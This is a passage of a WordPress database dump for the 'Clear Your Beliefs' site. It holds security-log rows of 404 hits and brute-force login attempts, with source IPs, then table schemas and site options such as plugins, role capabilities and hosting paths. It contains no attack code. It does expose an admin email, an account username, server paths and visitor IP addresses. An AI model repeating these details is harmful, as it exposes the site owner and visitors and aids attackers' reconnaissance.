(97553, 'four_oh_four', '2018-05-02 20:15:55', '2018-05-03 01:15:55', '64.62.252.163', NULL, NULL),
(97554, 'four_oh_four', '2018-05-02 20:18:24', '2018-05-03 01:18:24', '185.86.13.213', NULL, NULL),
(97555, 'four_oh_four', '2018-05-02 20:41:17', '2018-05-03 01:41:17', '185.86.164.109', NULL, NULL),
(97556, 'four_oh_four', '2018-05-02 20:45:44', '2018-05-03 01:45:44', '202.142.172.10', NULL, NULL),
(97557, 'four_oh_four', '2018-05-02 20:45:45', '2018-05-03 01:45:45', '202.142.172.10', NULL, NULL),
(97558, 'four_oh_four', '2018-05-02 21:16:29', '2018-05-03 02:16:29', '185.86.167.4', NULL, NULL),
(97559, 'four_oh_four', '2018-05-02 21:18:42', '2018-05-03 02:18:42', '185.86.164.103', NULL, NULL),
(97560, 'four_oh_four', '2018-05-02 21:29:02', '2018-05-03 02:29:02', '185.85.239.195', NULL, NULL),
(97561, 'four_oh_four', '2018-05-02 22:42:57', '2018-05-03 03:42:57', '185.86.164.101', NULL, NULL),
(97562, 'four_oh_four', '2018-05-02 22:54:31', '2018-05-03 03:54:31', '52.174.148.147', NULL, NULL),
(97563, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', NULL, NULL),
(97564, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', NULL, 0, 'admin'),
(97565, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', NULL, NULL),
(97566, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', NULL, 0, 'admin'),
(97567, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', NULL, NULL),
(97568, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', NULL, 0, 'admin'),
(97569, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', NULL, NULL),
(97570, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', NULL, 0, 'admin'),
(97571, 'four_oh_four', '2018-05-02 23:05:57', '2018-05-03 04:05:57', '185.86.164.106', NULL, NULL),
(97572, 'four_oh_four', '2018-05-02 23:08:34', '2018-05-03 04:08:34', '185.85.191.196', NULL, NULL),
(97573, 'four_oh_four', '2018-05-02 23:15:13', '2018-05-03 04:15:13', '185.86.164.101', NULL, NULL),
(97574, 'four_oh_four', '2018-05-02 23:18:37', '2018-05-03 04:18:37', '185.86.164.109', NULL, NULL),
(97575, 'four_oh_four', '2018-05-02 23:24:37', '2018-05-03 04:24:37', '185.86.164.106', NULL, NULL),
(97576, 'four_oh_four', '2018-05-03 00:01:45', '2018-05-03 05:01:45', '5.157.37.165', NULL, NULL),
(97577, 'four_oh_four', '2018-05-03 00:01:46', '2018-05-03 05:01:46', '5.157.37.165', NULL, NULL),
(97578, 'four_oh_four', '2018-05-03 00:11:48', '2018-05-03 05:11:48', '185.86.164.101', NULL, NULL),
(97579, 'four_oh_four', '2018-05-03 00:12:42', '2018-05-03 05:12:42', '185.86.13.213', NULL, NULL),
(97580, 'four_oh_four', '2018-05-03 00:14:38', '2018-05-03 05:14:38', '185.85.238.244', NULL, NULL),
(97581, 'four_oh_four', '2018-05-03 00:16:47', '2018-05-03 05:16:47', '103.81.77.151', NULL, NULL),
(97582, 'four_oh_four', '2018-05-03 00:29:25', '2018-05-03 05:29:25', '185.86.164.101', NULL, NULL),
(97583, 'four_oh_four', '2018-05-03 00:37:36', '2018-05-03 05:37:36', '52.47.168.171', NULL, NULL),
(97584, 'four_oh_four', '2018-05-03 00:37:37', '2018-05-03 05:37:37', '52.47.168.171', NULL, NULL),
(97585, 'four_oh_four', '2018-05-03 00:54:20', '2018-05-03 05:54:20', '207.46.13.216', NULL, NULL),
(97586, 'four_oh_four', '2018-05-03 01:02:08', '2018-05-03 06:02:08', '185.85.239.110', NULL, NULL),
(97587, 'four_oh_four', '2018-05-03 01:03:20', '2018-05-03 06:03:20', '185.86.13.213', NULL, NULL),
(97588, 'four_oh_four', '2018-05-03 01:46:23', '2018-05-03 06:46:23', '185.86.164.99', NULL, NULL),
(97589, 'four_oh_four', '2018-05-03 01:49:09', '2018-05-03 06:49:09', '185.85.191.201', NULL, NULL),
(97590, 'four_oh_four', '2018-05-03 02:11:02', '2018-05-03 07:11:02', '46.161.9.71', NULL, NULL),
(97591, 'four_oh_four', '2018-05-03 02:14:13', '2018-05-03 07:14:13', '66.249.69.96', NULL, NULL),
(97592, 'four_oh_four', '2018-05-03 02:20:21', '2018-05-03 07:20:21', '100.43.85.173', NULL, NULL),
(97593, 'four_oh_four', '2018-05-03 02:37:09', '2018-05-03 07:37:09', '185.119.81.11', NULL, NULL),
(97594, 'four_oh_four', '2018-05-03 02:57:44', '2018-05-03 07:57:44', '185.86.164.110', NULL, NULL),
(97463, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', NULL, NULL),
(97462, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', NULL, 0, 'admin'),
(97461, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', NULL, NULL),
(97460, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', NULL, 0, 'admin'),
(97459, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', NULL, NULL),
(97458, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', NULL, 0, 'admin'),
(97457, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', NULL, NULL),
(97456, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', NULL, 0, 'admin'),
(97455, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', NULL, NULL),
(97454, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', NULL, 0, 'admin'),
(97453, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', NULL, NULL),
(97452, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', NULL, 0, 'admin'),
(97451, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', NULL, NULL),
(97450, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', NULL, 0, 'admin'),
(97449, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', NULL, NULL),
(97448, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', NULL, 0, 'admin'),
(97447, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', NULL, NULL),
(97446, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', NULL, 0, 'admin'),
(97445, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', NULL, NULL),
(97444, 'four_oh_four', '2018-05-02 06:44:54', '2018-05-02 11:44:54', '185.85.190.132', NULL, NULL),
(97443, 'four_oh_four', '2018-05-02 06:42:03', '2018-05-02 11:42:03', '65.49.2.176', NULL, NULL),
(97442, 'four_oh_four', '2018-05-02 06:26:55', '2018-05-02 11:26:55', '185.86.164.99', NULL, NULL),
(97441, 'four_oh_four', '2018-05-02 06:10:05', '2018-05-02 11:10:05', '66.249.69.102', NULL, NULL),
(97440, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', NULL, 0, 'admin'),
(97439, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', NULL, NULL),
(97438, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', NULL, 0, 'admin'),
(97437, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', NULL, NULL),
(97436, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', NULL, 0, 'admin'),
(97435, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', NULL, NULL),
(97434, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', NULL, 0, 'admin'),
(97433, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', NULL, NULL),
(97432, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', NULL, 0, 'admin'),
(97431, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', NULL, NULL),
(97430, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', NULL, 0, 'admin'),
(97429, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', NULL, NULL),
(97428, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', NULL, 0, 'admin'),
(97427, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', NULL, NULL),
(97426, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', NULL, 0, 'admin'),
(97425, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', NULL, NULL),
(97424, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', NULL, 0, 'admin'),
(97423, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', NULL, NULL),
(97422, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', NULL, 0, 'admin'),
(97421, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', NULL, NULL),
(97420, 'four_oh_four', '2018-05-02 06:09:09', '2018-05-02 11:09:09', '103.53.169.27', NULL, NULL),
(97419, 'four_oh_four', '2018-05-02 06:09:08', '2018-05-02 11:09:08', '103.53.169.27', NULL, NULL),
(97418, 'four_oh_four', '2018-05-02 05:42:42', '2018-05-02 10:42:42', '185.86.167.4', NULL, NULL),
(97417, 'four_oh_four', '2018-05-02 05:37:56', '2018-05-02 10:37:56', '185.86.167.4', NULL, NULL),
(97416, 'four_oh_four', '2018-05-02 04:56:32', '2018-05-02 09:56:32', '77.88.5.39', NULL, NULL),
(97415, 'four_oh_four', '2018-05-02 04:25:58', '2018-05-02 09:25:58', '180.76.15.12', NULL, NULL),
(97414, 'four_oh_four', '2018-05-02 03:44:46', '2018-05-02 08:44:46', '73.124.255.149', NULL, NULL),
(97413, 'four_oh_four', '2018-05-02 03:34:43', '2018-05-02 08:34:43', '176.240.165.49', NULL, NULL),
(97412, 'four_oh_four', '2018-05-02 03:34:34', '2018-05-02 08:34:34', '176.240.165.49', NULL, NULL),
(97411, 'four_oh_four', '2018-05-02 03:34:29', '2018-05-02 08:34:29', '176.240.165.49', NULL, NULL),
(97410, 'four_oh_four', '2018-05-02 03:34:21', '2018-05-02 08:34:21', '176.240.165.49', NULL, NULL),
(97409, 'four_oh_four', '2018-05-02 03:34:11', '2018-05-02 08:34:11', '176.240.165.49', NULL, NULL),
(97408, 'four_oh_four', '2018-05-02 03:33:57', '2018-05-02 08:33:57', '103.199.17.24', NULL, NULL),
(97407, 'four_oh_four', '2018-05-02 03:33:56', '2018-05-02 08:33:56', '103.199.17.24', NULL, NULL),
(97406, 'four_oh_four', '2018-05-02 03:33:56', '2018-05-02 08:33:56', '176.240.165.49', NULL, NULL),
(97405, 'four_oh_four', '2018-05-02 02:45:38', '2018-05-02 07:45:38', '185.86.164.109', NULL, NULL),
(97404, 'four_oh_four', '2018-05-02 02:39:14', '2018-05-02 07:39:14', '185.119.81.11', NULL, NULL),
(97403, 'four_oh_four', '2018-05-02 02:11:26', '2018-05-02 07:11:26', '93.138.122.132', NULL, NULL),
(97402, 'four_oh_four', '2018-05-02 02:06:48', '2018-05-02 07:06:48', '78.58.143.166', NULL, NULL),
(97401, 'four_oh_four', '2018-05-02 02:06:19', '2018-05-02 07:06:19', '191.101.112.178', NULL, NULL),
(97400, 'four_oh_four', '2018-05-02 02:06:12', '2018-05-02 07:06:12', '191.101.112.178', NULL, NULL),
(97399, 'four_oh_four', '2018-05-02 01:51:15', '2018-05-02 06:51:15', '93.158.161.54', NULL, NULL),
(97398, 'four_oh_four', '2018-05-02 01:38:24', '2018-05-02 06:38:24', '211.171.168.233', NULL, NULL),
(97397, 'four_oh_four', '2018-05-02 01:22:21', '2018-05-02 06:22:21', '141.8.144.13', NULL, NULL),
(97396, 'four_oh_four', '2018-05-02 01:22:18', '2018-05-02 06:22:18', '5.255.250.134', NULL, NULL),
(97395, 'four_oh_four', '2018-05-02 01:18:20', '2018-05-02 06:18:20', '101.255.45.22', NULL, NULL),
(97394, 'four_oh_four', '2018-05-02 01:18:18', '2018-05-02 06:18:18', '101.255.45.22', NULL, NULL),
(97393, 'four_oh_four', '2018-05-02 01:03:29', '2018-05-02 06:03:29', '182.186.55.116', NULL, NULL),
(97392, 'four_oh_four', '2018-05-02 01:03:27', '2018-05-02 06:03:27', '182.186.55.116', NULL, NULL),
(97391, 'four_oh_four', '2018-05-02 00:24:19', '2018-05-02 05:24:19', '185.85.191.196', NULL, NULL),
(97390, 'four_oh_four', '2018-05-02 00:12:00', '2018-05-02 05:12:00', '185.86.164.108', NULL, NULL),
(97389, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', NULL, 0, 'heyrossbutcher'),
(97388, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', NULL, NULL),
(97387, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', NULL, 0, 'heyrossbutcher'),
(97386, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', NULL, NULL),
(97385, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', NULL, 0, 'heyrossbutcher'),
(97384, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', NULL, NULL),
(97383, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', NULL, 0, 'heyrossbutcher'),
(97382, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', NULL, NULL),
(97381, 'four_oh_four', '2018-05-01 23:54:31', '2018-05-02 04:54:31', '109.86.115.141', NULL, NULL),
(97380, 'four_oh_four', '2018-05-01 23:48:46', '2018-05-02 04:48:46', '185.86.167.4', NULL, NULL),
(97379, 'four_oh_four', '2018-05-01 23:43:37', '2018-05-02 04:43:37', '5.255.250.77', NULL, NULL),
(97378, 'four_oh_four', '2018-05-01 23:40:43', '2018-05-02 04:40:43', '185.86.164.99', NULL, NULL),
(97377, 'four_oh_four', '2018-05-01 23:12:11', '2018-05-02 04:12:11', '185.86.164.98', NULL, NULL),
(97376, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', NULL, 0, 'admin'),
(97375, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', NULL, NULL),
(97374, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', NULL, 0, 'admin'),
(97373, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', NULL, NULL),
(97372, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', NULL, 0, 'admin'),
(97371, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', NULL, NULL),
(97370, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', NULL, 0, 'admin'),
(97369, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', NULL, NULL),
(97368, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', NULL, 0, 'admin'),
(97367, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', NULL, NULL),
(97366, 'four_oh_four', '2018-05-01 22:53:18', '2018-05-02 03:53:18', '185.86.164.102', NULL, NULL),
(97365, 'four_oh_four', '2018-05-01 22:37:28', '2018-05-02 03:37:28', '108.46.181.160', NULL, NULL),
(97364, 'four_oh_four', '2018-05-01 22:12:08', '2018-05-02 03:12:08', '185.85.239.195', NULL, NULL),
(97363, 'four_oh_four', '2018-05-01 22:00:21', '2018-05-02 03:00:21', '186.89.75.146', NULL, NULL),
(97362, 'four_oh_four', '2018-05-01 22:00:03', '2018-05-02 03:00:03', '186.89.75.146', NULL, NULL),
(97361, 'four_oh_four', '2018-05-01 21:20:52', '2018-05-02 02:20:52', '185.86.164.98', NULL, NULL),
(97360, 'four_oh_four', '2018-05-01 20:05:12', '2018-05-02 01:05:12', '198.154.81.43', NULL, NULL),
(97359, 'four_oh_four', '2018-05-01 20:05:10', '2018-05-02 01:05:10', '198.154.81.43', NULL, NULL),
(97358, 'four_oh_four', '2018-05-01 20:03:56', '2018-05-02 01:03:56', '207.46.13.103', NULL, NULL),
(97357, 'four_oh_four', '2018-05-01 19:48:40', '2018-05-02 00:48:40', '103.199.17.24', NULL, NULL),
(97356, 'four_oh_four', '2018-05-01 19:48:39', '2018-05-02 00:48:39', '103.199.17.24', NULL, NULL),
(97355, 'four_oh_four', '2018-05-01 19:04:36', '2018-05-02 00:04:36', '104.148.118.12', NULL, NULL),
(97354, 'four_oh_four', '2018-05-01 19:04:35', '2018-05-02 00:04:35', '104.148.118.12', NULL, NULL),
(97353, 'four_oh_four', '2018-05-01 18:39:57', '2018-05-01 23:39:57', '185.86.164.109', NULL, NULL),
(97352, 'four_oh_four', '2018-05-01 18:35:43', '2018-05-01 23:35:43', '185.86.164.108', NULL, NULL),
(97351, 'four_oh_four', '2018-05-01 17:55:18', '2018-05-01 22:55:18', '185.86.164.102', NULL, NULL),
(97350, 'four_oh_four', '2018-05-01 17:20:29', '2018-05-01 22:20:29', '185.86.164.107', NULL, NULL),
(97596, 'four_oh_four', '2018-05-03 03:58:32', '2018-05-03 08:58:32', '207.46.13.197', NULL, NULL),
(97595, 'four_oh_four', '2018-05-03 03:31:26', '2018-05-03 08:31:26', '5.101.99.155', NULL, NULL),
(97525, 'four_oh_four', '2018-05-02 16:32:00', '2018-05-02 21:32:00', '185.86.13.213', NULL, NULL),
(97526, 'four_oh_four', '2018-05-02 16:42:46', '2018-05-02 21:42:46', '185.86.164.99', NULL, NULL),
(97349, 'four_oh_four', '2018-05-01 17:18:35', '2018-05-01 22:18:35', '185.86.164.98', NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_links`
--

CREATE TABLE IF NOT EXISTS `cyb_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_options`
--

CREATE TABLE IF NOT EXISTS `cyb_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) DEFAULT NULL,
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=108973 ;

--
-- Dumping data for table `cyb_options`
--

INSERT INTO `cyb_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(1, 'siteurl', 'http://clearyourbeliefs.com', 'yes'),
(2, 'blogname', 'Clear Your Beliefs', 'yes'),
(3, 'blogdescription', '', 'yes'),
(4, 'users_can_register', '0', 'yes'),
(5, 'admin_email', 'blesko@leskowebengineering.com', 'yes'),
(6, 'start_of_week', '0', 'yes'),
(7, 'use_balanceTags', '0', 'yes'),
(8, 'use_smilies', '1', 'yes'),
(9, 'require_name_email', '1', 'yes'),
(10, 'comments_notify', '', 'yes'),
(11, 'posts_per_rss', '10', 'yes'),
(12, 'rss_use_excerpt', '1', 'yes'),
(13, 'mailserver_url', 'mail.example.com', 'yes'),
(14, 'mailserver_login', 'login@example.com', 'yes'),
(15, 'mailserver_pass', 'password', 'yes'),
(16, 'mailserver_port', '110', 'yes'),
(17, 'default_category', '1', 'yes'),
(18, 'default_comment_status', 'open', 'yes'),
(19, 'default_ping_status', 'open', 'yes'),
(20, 'default_pingback_flag', '1', 'yes'),
(21, 'posts_per_page', '10', 'yes'),
(22, 'date_format', 'F j, Y', 'yes'),
(23, 'time_format', 'g:i a', 'yes'),
(24, 'links_updated_date_format', 'F j, Y g:i a', 'yes'),
(28, 'comment_moderation', '', 'yes'),
(29, 'moderation_notify', '1', 'yes'),
(30, 'permalink_structure', '/%postname%/', 'yes'),
(32, 'hack_file', '0', 'yes'),
(33, 'blog_charset', 'UTF-8', 'yes'),
(34, 'moderation_keys', '', 'no'),
(35, 'active_plugins', 'a:19:{i:0;s:34:"Ready-USAepay/usaepay-payments.php";i:1;s:41:"all-in-one-favicon/all-in-one-favicon.php";i:3;s:38:"commercial/ready-ecommerce-licence.php";i:4;s:31:"custom-css-js/custom-css-js.php";i:5;s:37:"disable-comments/disable-comments.php";i:6;s:33:"duplicate-post/duplicate-post.php";i:7;s:45:"ithemes-security-pro/ithemes-security-pro.php";i:8;s:27:"js_composer/js_composer.php";i:9;s:39:"pixelyoursite-pro/pixelyoursite-pro.php";i:10;s:29:"ready-ecommerce/ecommerce.php";i:11;s:59:"rt-custom-css-page-and-post/rt-custom-css-page-and-post.php";i:13;s:43:"shortcodes-ultimate/shortcodes-ultimate.php";i:14;s:39:"simple-custom-css/simple-custom-css.php";i:15;s:63:"unlimited-addons-for-wpbakery-page-builder/unlimited_addons.php";i:16;s:25:"user-photo/user-photo.php";i:17;s:43:"visual-form-builder/visual-form-builder.php";i:18;s:34:"wp-clone-by-wp-academy/wpclone.php";i:19;s:22:"wp-editor/wpeditor.php";i:20;s:75:"wp-time-slots-availability-calendar/wp-time-slots-availability-calendar.php";}', 'yes'),
(36, 'home', 'http://clearyourbeliefs.com', 'yes'),
(37, 'category_base', '', 'yes'),
(38, 'ping_sites', 'http://rpc.pingomatic.com/', 'yes'),
(40, 'comment_max_links', '2', 'yes'),
(41, 'gmt_offset', '-5', 'yes'),
(42, 'default_email_category', '1', 'yes'),
(43, 'recently_edited', 'a:5:{i:0;s:80:"/homepages/40/d300047147/htdocs/cyb/wp-content/themes/clearyourbeliefs/style.css";i:2;s:97:"/homepages/40/d300047147/htdocs/cyb/wp-content/themes/clearyourbeliefs/page-templates/coaches.php";i:3;s:83:"/homepages/40/d300047147/htdocs/cyb/wp-content/themes/clearyourbeliefs/category.php";i:4;s:80:"/homepages/40/d300047147/htdocs/cyb/wp-content/plugins/affiliates/affiliates.php";i:5;s:79:"/homepages/40/d300047147/htdocs/cyb/wp-content/themes/clearyourbeliefs/page.php";}', 'no'),
(44, 'template', 'twentyfourteen', 'yes'),
(45, 'stylesheet', 'clearyourbeliefs', 'yes'),
(46, 'comment_whitelist', '1', 'yes'),
(47, 'blacklist_keys', '', 'no'),
(48, 'comment_registration', '', 'yes'),
(49, 'html_type', 'text/html', 'yes'),
(50, 'use_trackback', '0', 'yes'),
(51, 'default_role', 'subscriber', 'yes'),
(52, 'db_version', '38590', 'yes'),
(53, 'uploads_use_yearmonth_folders', '1', 'yes'),
(54, 'upload_path', '', 'yes'),
(55, 'blog_public', '1', 'yes'),
(56, 'default_link_category', '2', 'yes'),
(57, 'show_on_front', 'page', 'yes'),
(58, 'tag_base', '', 'yes'),
(59, 'show_avatars', '1', 'yes'),
(60, 'avatar_rating', 'G', 'yes'),
(61, 'upload_url_path', '', 'yes'),
(62, 'thumbnail_size_w', '150', 'yes'),
(63, 'thumbnail_size_h', '150', 'yes'),
(64, 'thumbnail_crop', '1', 'yes'),
(65, 'medium_size_w', '300', 'yes'),
(66, 'medium_size_h', '300', 'yes'),
(67, 'avatar_default', 'mystery', 'yes'),
(68, 'large_size_w', '1024', 'yes'),
(69, 'large_size_h', '1024', 'yes'),
(70, 'image_default_link_type', 'file', 'yes'),
(71, 'image_default_size', '', 'yes'),
(72, 'image_default_align', '', 'yes'),
(73, 'close_comments_for_old_posts', '', 'yes'),
(74, 'close_comments_days_old', '14', 'yes'),
(75, 'thread_comments', '1', 'yes'),
(76, 'thread_comments_depth', '5', 'yes'),
(77, 'page_comments', '', 'yes'),
(78, 'comments_per_page', '50', 'yes'),
(79, 'default_comments_page', 'newest', 'yes'),
(80, 'comment_order', 'asc', 'yes'),
(81, 'sticky_posts', 'a:0:{}', 'yes'),
(82, 'widget_categories', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(83, 'widget_text', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(84, 'widget_rss', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(85, 'uninstall_plugins', 'a:5:{s:38:"commercial/ready-ecommerce-licence.php";a:2:{i:0;s:12:"modInstaller";i:1;s:9:"uninstall";}s:34:"Ready-USAepay/usaepay-payments.php";a:2:{i:0;s:12:"modInstaller";i:1;s:9:"uninstall";}s:39:"simple-custom-css/simple-custom-css.php";s:15:"sccss_uninstall";s:41:"all-in-one-favicon/all-in-one-favicon.php";a:2:{i:0;s:15:"AllInOneFavicon";i:1;s:19:"uninstallAioFavicon";}s:45:"ithemes-security-pro/ithemes-security-pro.php";a:2:{i:0;s:10:"ITSEC_Core";i:1;s:12:"on_uninstall";}}', 'no'),
(86, 'timezone_string', '', 'yes'),
(87, 'page_for_posts', '2119', 'yes'),
(88, 'page_on_front', '1941', 'yes'),
(89, 'default_post_format', '0', 'yes'),
(90, 'link_manager_enabled', '0', 'yes'),
(91, 'initial_db_version', '26691', 'yes'),
(92, 'cyb_user_roles', 'a:6:{s:13:"administrator";a:2:{s:4:"name";s:13:"Administrator";s:12:"capabilities";a:72:{s:13:"switch_themes";b:1;s:11:"edit_themes";b:1;s:16:"activate_plugins";b:1;s:12:"edit_plugins";b:1;s:10:"edit_users";b:1;s:10:"edit_files";b:1;s:14:"manage_options";b:1;s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:6:"import";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:8:"level_10";b:1;s:7:"level_9";b:1;s:7:"level_8";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:12:"delete_users";b:1;s:12:"create_users";b:1;s:17:"unfiltered_upload";b:1;s:14:"edit_dashboard";b:1;s:14:"update_plugins";b:1;s:14:"delete_plugins";b:1;s:15:"install_plugins";b:1;s:13:"update_themes";b:1;s:14:"install_themes";b:1;s:11:"update_core";b:1;s:10:"list_users";b:1;s:12:"remove_users";b:1;s:13:"promote_users";b:1;s:18:"edit_theme_options";b:1;s:13:"delete_themes";b:1;s:6:"export";b:1;s:10:"copy_posts";b:1;s:15:"edit_custom_css";b:1;s:15:"read_custom_css";b:1;s:17:"delete_custom_css";b:1;s:16:"edit_custom_csss";b:1;s:23:"edit_others_custom_csss";b:1;s:19:"publish_custom_csss";b:1;s:18:"delete_custom_csss";b:1;s:28:"delete_published_custom_csss";b:1;s:25:"delete_others_custom_csss";b:1;s:26:"edit_published_custom_csss";b:1;}}s:6:"editor";a:2:{s:4:"name";s:6:"Editor";s:12:"capabilities";a:35:{s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s